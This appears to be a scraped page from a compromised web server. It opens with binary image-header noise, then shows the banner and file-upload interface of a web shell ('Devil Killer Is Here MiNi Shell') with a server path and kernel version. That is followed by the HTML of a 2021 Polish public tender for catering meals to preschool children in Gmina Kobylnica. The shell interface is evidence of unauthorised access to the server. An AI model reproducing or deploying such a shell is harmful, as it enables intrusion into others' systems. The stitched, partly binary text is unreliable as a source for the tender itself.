JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210621/0008830901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00088309 z dnia 2021-06-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Żywienie dzieci z oddziałów przedszkolnych znajdujących się na terenie Gminy Kobylnica (usługa cateringowa). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W KOBYLNICY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365696881</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wodna 20 lokal 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobylnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-251</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 8415912</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 841 5915</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@kobylnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cuwkobylnica.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Usług Wspólnych w Kobylnicy</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">365696881</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Wodna 20/2</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kobylnica</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">76-251</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">59 8415912</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">59 8415915</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">cuw@kobylnica.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://cuwkobylnica.bip.gov.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Żywienie dzieci z oddziałów przedszkolnych znajdujących się na terenie Gminy Kobylnica (usługa cateringowa). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-941e3e09-cffc-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00088309</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000074/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Żywienie dzieci z oddziałów przedszkolnych znajdujących się na terenie Gminy Kobylnica (usługa cateringowa) w okresie od 01.09.2021 r. do 31.08.2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/cuwkobylnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/cuwkobylnica .<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, wyjaśnienia, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: a.skwira@kobylnica.pl , cuw@kobylnica.pl .<br/>Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest Centrum Usług Wspólnych w Kobylnicy, ul. Wodna 20/2, 76-251 Kobylnica reprezentowana przez Dyrektora, adres email: kobylnica@kobylnica.pl,tel. 59 841 59 12, który został wyznaczony do prowadzenia spraw związanych z zamówieniami publicznymi w Gminie Kobylnica;<br/>2)	Administrator wyznaczył inspektora ochrony danych, z którym może się Pan/Pani kontaktować pod adresem email: j.mielczarek@kobylnica.eu tel. 59 858 62 00 <br/>wew. 259;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>a)	art. 6 ust. 1 lit. b, c RODO (Dz. Urz. UE L 119 z 04.05.2016, str. 1),<br/>b)	art. 18 w zw. z art. 19 ustawy Pzp;<br/>4)	Wypełnienie obowiązku prawnego polega na prowadzeniu spraw, do których zobowiązane jest Centrum Usług Wspólnych w Kobylnicy w związku z realizacją zadań dot. realizacji niniejszego zamówienia publicznego;<br/>5)	W związku z przetwarzaniem danych w celach, o których mowa w pkt 3 i 4 odbiorcami danych osobowych mogą być:<br/>a)	organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa a w szczególności w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>b)	inne podmioty, które na podstawie umów zawartych z Administratorem określonym w pkt. 1 świadczące obsługę w tym prawną i informatyczną na rzecz Zamawiającego;<br/>6)	Pani/Pana Pani/Pana dane osobowe będą przechowywane co najmniej zgodnie z art. 78 ustawy Pzp, jednak nie dłużej niż 5 lat zgodnie z Jednolitym Rzeczowym Wykazem Akt obowiązującym w Centrum Usług Wspólnych w Kobylnicy, a jeżeli czas trwania umowy jest dłuższy – okres przechowywania obejmuje cały okres obowiązywania umowy oraz 10 lat od daty wygaśnięcia umowy zgodnie z Jednolitym Rzeczowym Wykazem Akt obowiązującym w Centrum Usług Wspólnych w Kobylnicy;<br/>7)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem postępowaniu o udzielnie zamówienia publicznego, konsekwencją niepodania określonych danych może być odrzucenie oferty;<br/>8)	Pana/Pani dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu stosownie do art. 22 RODO;<br/>9)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9)	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c,<br/>c)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW-DOR.271.9.2021.OZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest żywienie dzieci z oddziałów przedszkolnych znajdujących się na terenie Gminy Kobylnica w ramach usługi cateringu w okresie wskazanym <br/>w Rozdziale V, które obejmuje m. in. przygotowanie, dostarczenie posiłków oraz dodatkowo w oddziałach przy Szkole Podstawowej w Kobylnicy – wydawanie posiłków, zmywanie i wyparzanie naczyń po posiłkach <br/>3.	Przedmiot zamówienia obejmuje łącznie szacowaną ilość 267 dzieci w 5 oddziałach (częściach):<br/>1)	Część 1: Żywienie dzieci z oddziałów przedszkolnych przy Szkole Podstawowej <br/>w Kobylnicy, ul. Główna 63:<br/>a)	szacunkowa liczba żywionych dzieci w okresie 01.09.2021 r. do 30.06.2022 r.: 90 dzieci, 211 dostaw (dni):<br/>	oddziały 5–6 latków: pełne wyżywienie tj. śniadanie, obiad, podwieczorek,<br/>b)	szacunkowa liczba żywionych dzieci w okresie letnim w miesiącu lipcu 2022r.: 50 dzieci, 21 dostaw, pełne wyżywienie tj. śniadanie, obiad, podwieczorek.<br/>Szacunkowa liczba dostaw (dni) wynosi łącznie: 232;<br/>Wszystkie posiłki dostarczane będą w pojemnikach zbiorowych.<br/>Uwaga: Od 01.09.2021 r. oddziały przedszkolne planuje się w dwóch lokalizacjach w Kobylnicy tj. ul. Główna 63 – 18 dzieci i ul. Transportowa 31 – 72 dzieci (wariantowo przy ul. Wodnej 20/4).<br/>2)	Część 2: Żywienie dzieci z oddziałów przedszkolnych przy Szkole Podstawowej w Kwakowie, ul. Słupska 5:<br/>a)	szacunkowa liczba żywionych dzieci w okresie od 01.09.2021 r. do 30.06.2022r.: <br/>38 dzieci, 211 dostaw, w tym:<br/>	oddział 4–5 latków, pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>21 dzieci,<br/>	oddział 5–6 latków, niepełne wyżywienie tj. obiad, podwieczorek (bez śniadania) – 17 dzieci.<br/>Szacunkowa liczba dostaw (dni) wynosi łącznie: 211; <br/>Wszystkie posiłki dostarczane będą w pojemnikach zbiorowych.<br/>3)	Część 3: Dożywianie dzieci z oddziałów przedszkolnych przy Szkole Podstawowej w Słonowicach, Słonowice 4:<br/>a)	szacunkowa liczba żywionych dzieci w okresie od 01.09.2021 r. do 30.06.2022r.: <br/>46 dzieci, 211 dostaw, w tym:<br/>	oddział 3–4 latków, pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>21 dzieci,<br/>	oddział 5–6 latków, pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>25 dzieci.<br/>Szacunkowa liczba dostaw (dni) wynosi łącznie: 211; <br/>Wszystkie posiłki dostarczane będą w pojemnikach zbiorowych. <br/>4)	Część 4: Dożywianie dzieci z oddziałów przedszkolnych przy Szkole Podstawowej w Sycewicach, ul. Szkolna 1:<br/>a)	szacunkowa liczba żywionych dzieci w okresie 01.09.2021 r. do 30.06.2022 r.: <br/>43 dzieci, 211 dostaw, w tym:<br/>	oddział 3–4 latków pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>18 dzieci,<br/>	oddział 5–6 latków pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>25 dzieci,<br/>b)	szacunkowa liczba żywionych dzieci w okresie letnim w miesiącu lipcu/sierpniu 2022 r.: 15 dzieci, 22 dostawy:<br/>pełne wyżywienie tj. śniadanie, obiad, podwieczorek.<br/>Szacunkowa liczba dostaw (dni) wynosi łącznie: 232;<br/>Wszystkie posiłki dostarczane będą w pojemnikach zbiorowych.<br/>5)	Część 5: Dożywianie dzieci z oddziałów przedszkolnych przy Szkole Podstawowej w Kończewie, ul. Szkolna 1, w tym: od 1.09 br. oddziały będą mieścić się przy szkole w Kończewie (wariantowo 1 oddział w Sierakowie 21B przy świetlicy wiejskiej):<br/>a)	szacunkowa liczba żywionych dzieci w okresie 01.09.2021 r. do 30.06.2022 r.: <br/>50 dzieci, 211 dostaw, w tym:<br/>	oddział 3-4 latków pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>26 dzieci,<br/>	oddział 5-6 latków pełne wyżywienie tj. śniadanie, obiad, podwieczorek – <br/>24 dzieci.<br/>b)	szacunkowa liczba żywionych dzieci w okresie letnim w miesiącu lipcu/sierpniu 2022 r.: 15 dzieci, 22 dostawy:<br/>pełne wyżywienie tj. śniadanie, obiad, podwieczorek.<br/>Szacunkowa liczba dostaw (dni) wynosi łącznie: 232.<br/>Wszystkie posiłki dostarczane będą w pojemnikach zbiorowych.<br/>4.	Wymagania dotyczące realizacji usługi żywienia w każdej Części nr 1-5 przedmiotu zamówienia:<br/>1)	Zakres zamówienia obejmuje żywienie dzieci na zasadach usługi cateringu w dni robocze, od poniedziałku do piątku, z wyłączeniem dni wolnych od pracy i świąt, który obejmuje przygotowanie posiłków, dowóz posiłków do placówek wskazanych w ust. 3 i wniesienie w miejsce wskazane przez pracownika Zamawiającego oraz odbiór pojemników.<br/>2)	Wykonawca zobowiązany jest:<br/>a)	przygotowane posiłki dostarczyć do oddziałów przedszkolnych wskazanych w ust. 3 w następujących godzinach:<br/>Część 1: oddział przedszkolny przy Szkole Podstawowej w Kobylnicy:<br/>•	śniadanie: do godz. 9:00,<br/>•	obiad i podwieczorek: do godz. 12:00,<br/>Część 2: oddział przedszkolny przy Szkole Podstawowej w Kwakowie:<br/>•	śniadanie: do godz. 8:30,<br/>•	obiad i podwieczorek: do godz. 12:00,<br/>Część 3: oddział przedszkolny przy Szkole Podstawowej w Słonowicach:<br/>•	śniadanie: do godz. 8:00,<br/>•	obiad i podwieczorek: do godz. 10:30,<br/>Część 4: oddział przedszkolny przy Szkole Podstawowej w Sycewicach:<br/>•	śniadanie: do godz. 8:00,<br/>•	obiad i podwieczorek: do godz. 10:30,<br/>Część 5: oddział przedszkolny przy Szkole Podstawowej w Kończewie:<br/>•	śniadanie: do godz. 7:45,<br/>•	obiad i podwieczorek: do godz. 10:30,<br/>b)	zapewnić ciągłość usługi żywienia dzieci z oddziałów przedszkolnych,<br/>c)	do dostarczania posiłków płynnych (zupy, sosy, napoje) w szczelnie zamkniętych pojemnikach (termosach), które są zabezpieczone przed otwarciem i uniemożliwiają wylanie zawartości oraz zapewniają utrzymanie odpowiedniej temperatury posiłku, z podziałem na poszczególne oddziały;<br/>d)	do dostarczania posiłków stałych w zamykanych zbiorczych pojemnikach (termosach), zabezpieczonych przed otwarciem i uniemożliwiające wysypanie się zawartości oraz zapewniają utrzymanie odpowiedniej temperatury posiłku, <br/>z podziałem na poszczególne oddziały;<br/>e)	zapewnić odpowiednią ilość termosów i opakowań zbiorczych niezbędnych do przewozu posiłków gwarantujących właściwą temperaturę i ochronę oraz jakość przewożonych potraw wraz z ich myciem, wyparzaniem oraz ich odbiór; posiłki serwowane na gorąco powinny być transportowane w pojemnikach, które utrzymują temperaturę wewnątrz + 60oC, a ich czas przewozu nie przekroczy 2 godzin;<br/>f)	do przygotowania obiadów składających się z dwóch dań: zupa i drugie danie (posiłki mają być gorące) oraz kompotu; temperatura dostarczonych gorących posiłków nie może być niższa niż + 60ºC;<br/>g)	wydawania posiłków oraz odbioru i mycia (wyparzania) naczyń po posiłkach oraz dostarczania czystych naczyń do oddziału przedszkolnego funkcjonującego przy Szkole Podstawowej w Kobylnicy w lokalizacjach przy ul. Transportowe 31 i ul. Głównej 63 (wariantowo przy ul. Wodnej 20/4), (naczynia zapewnia Szkoła Podstawowa w Kobylnicy),<br/>h)	do przygotowania i dostarczenia pięciodniowego jadłospisu w przedostatni dzień roboczy poprzedzający dany tydzień (każdy czwartek), w celu akceptacji przez przedstawiciela szkoły, który niezwłocznie naniesie ewentualne poprawki, a Wykonawca zobowiązany jest je uwzględnić oraz zobowiązany jest do dostarczenia informacji o składzie posiłków w ramach szczególnych potrzeb żywieniowych, o których mowa w ust. 5 – na każde żądanie Zamawiającego i w terminie przez niego wskazanym,<br/>i)	wykonywania przedmiotu zamówienia przy wykorzystaniu wykwalifikowanego personelu, tym osób przygotowujących i dostarczających posiłki, posiadających aktualne orzeczenie lekarskie potwierdzone wpisem w książeczce sanitarno-epidemiologicznej oraz przeszkolenie w zakresie przepisów BHP i p.poż.;<br/>Uwaga: Zamawiający we własnym zakresie zapewnia naczynia i sztućce do podawania posiłków oraz utrzymanie czystości w miejscach podawania posiłków oraz porcjowanie i podawanie posiłków, z zastrzeżeniem lit g tj. szkoła Podstawowa w Kobylnicy.<br/>3)	Zamawiający nie dopuszcza wykonywania posiłków z półproduktów; przygotowanie i podanie posiłku z półproduktu będzie stanowiło rażące naruszenie postanowień niniejszego ogłoszenia o zamówieniu i warunków umowy oraz będzie uprawniało Zamawiającego do natychmiastowego rozwiązania umowy z naliczeniem kary umownej.<br/>4)	Produkty wykorzystywane do przygotowywania posiłków muszą spełniać Normy Żywienia opracowane przez Instytut Żywności i Żywienia, być świeże tj. posiadać ważny termin przydatności do spożycia i nie mogą być genetycznie modyfikowane; <br/>5)	Wykonawca jako zakład prowadzący działalność w zakresie produkcji posiłków musi posiadać Decyzję wydaną przez właściwego miejscowo Państwowego Inspektora Sanitarnego na podstawie przepisów ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t. j. Dz.U. z 2020 r. poz. 2021);<br/>Uwaga: Decyzja powinna być wydana na produkcję żywności oraz dystrybucję żywności w ramach cateringu (m.in. ze względu na potrzebę uwzględnienia przepisów w zakresie warunków transportu żywności, dezynfekcji pojemników do przewożenia żywności).<br/>6)	Świadczenie usługi żywienia dzieci powinno być zgodne z wymaganiami określonymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia oraz w Rozporządzeniu Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz.U. z 2016 poz.1154) oraz zaleceniami Głównego Inspektora Sanitarnego i Instytutu Żywności i Żywienia w sprawie norm wyżywienia i żywienia jakie obowiązują w zakładach żywienia zbiorowego oraz jakości zdrowotnych żywności, z uwzględnieniem aktualnych norm żywienia dla populacji polskiej; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55524000-9 - Usługi dostarczania posiłków do szkół</span></h3> <h3 